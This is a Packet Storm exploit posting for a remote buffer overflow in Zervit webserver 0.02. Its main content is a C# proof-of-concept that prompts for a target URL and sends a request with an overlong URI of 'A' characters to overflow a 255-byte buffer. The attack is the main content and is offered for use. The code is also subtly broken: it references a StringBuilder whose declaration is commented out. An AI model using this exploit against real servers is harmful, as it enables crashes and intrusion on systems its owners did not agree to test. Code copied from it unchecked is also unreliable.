Zervit webserver version 0.02 suffers from a remote buffer overflow vulnerability.
716906102683fa275b36132876acd90673d96c37d9e4bf2fde2d57aac7f91d11####### Zervit Webserver 0.02 Buffer Overflow
########## By: e.wiZz!
#########Site: www.balcansecurity.com
######## Found with ServMeNot (world's sexiest fuzzer :P )
In the wild...
########################################################################################
######Vend0r site: http://www.ohloh.net/projects/mereo
/* When requested uri isn't found,it goes to char tmp[255],
and later it is used to output,you need 256 chars to overflow (check source "http.c") */
using System;
using System.IO;
using System.Net;
using System.Text;
class whatsoever
{
static void Main()
{
// StringBuilder sb = new StringBuilder();
//byte[] buf = new byte[8192];
Console.WriteLine("Enter site: (http://localhost)");
string sajt = Console.ReadLine();
string uribad = "/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";
HttpWebRequest request = (HttpWebRequest)
WebRequest.Create(sajt+uribad);
HttpWebResponse response = (HttpWebResponse)
request.GetResponse();
// you shouldn't see response
Console.WriteLine(sb.ToString());
}
}
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed